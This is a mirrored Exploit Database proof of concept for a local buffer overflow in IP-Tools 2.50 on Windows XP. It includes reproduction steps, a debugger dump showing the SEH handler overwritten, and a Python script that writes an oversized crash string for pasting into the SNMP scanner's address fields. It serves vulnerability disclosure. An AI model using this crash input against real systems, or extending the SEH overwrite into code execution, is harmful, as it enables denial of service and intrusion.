IP-Tools 2.50 – Local Buffer Overflow (PoC)

• Exploit Database
• 16 阅读

• 作者： Rafael Pedrero
  日期： 2019-01-30
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46286/

• # Exploit Title: IP TOOLS v2.50 - Denial of Service (PoC) and SEH overwritten Crash PoC
  # Discovery by: Rafael Pedrero
  # Discovery Date: 2018-12-20
  # Vendor Homepage: https://www.ks-soft.net/ip-tools.eng/index.htm
  # Software Link : https://www.ks-soft.net/ip-tools.eng/index.htm / https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe
  # Tested Version: 2.50
  # Tested on: Windows XP SP3
  # Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
  
  # Steps to Produce the Crash:
  # 1.- Run IP-Tools.exe
  # 2.- Go to SNMP Scanner tab and copy content of IPTools_Crash.txt to clipboard
  # 3.- Paste the content into the field: 'From Addr' and 'To Addr'
  # 4.- Click 'Start' button and you will see a crash.
  
  
  '''
  SEH chain of main thread
  AddressSE handler
  0012F4B4 43434343
  42424242 *** CORRUPT ENTRY ***
  
  
  
  EAX 0012F4CC
  ECX 00000000
  EDX 44444444
  EBX 0012F4CC
  ESP 0012E490
  EBP 0012F4DC ASCII
  "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  ESI 0012E4A4 ASCII
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  EDI 02256720 ASCII
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  EIP 00403F70 IP-TOOLS.00403F70
  C 0ES 0023 32bit 0(FFFFFFFF)
  P 1CS 001B 32bit 0(FFFFFFFF)
  A 0SS 0023 32bit 0(FFFFFFFF)
  Z 0DS 0023 32bit 0(FFFFFFFF)
  S 0FS 003B 32bit 7FFDD000(FFF)
  T 0GS 0000 NULL
  D 0
  O 0LastErr ERROR_SUCCESS (00000000)
  EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
  ST0 empty
  ST1 empty
  ST2 empty
  ST3 empty
  ST4 empty
  ST5 empty
  ST6 empty
  ST7 empty
   3 2 1 0E S P U O Z D I
  FST 0120Cond 0 0 0 1Err 0 0 1 0 0 0 0 0(LT)
  FCW 1372Prec NEAR,64Mask1 1 0 0 1 0
  '''
  
  #!/usr/bin/env python
  
  junk = "\x41" * 4112
  crash = junk + "BBBB" + "CCCC" + "D" * (5000 - len(junk) - 8)
  f = open ("IPTools_Crash.txt", "w")
  f.write(crash)
  f.close()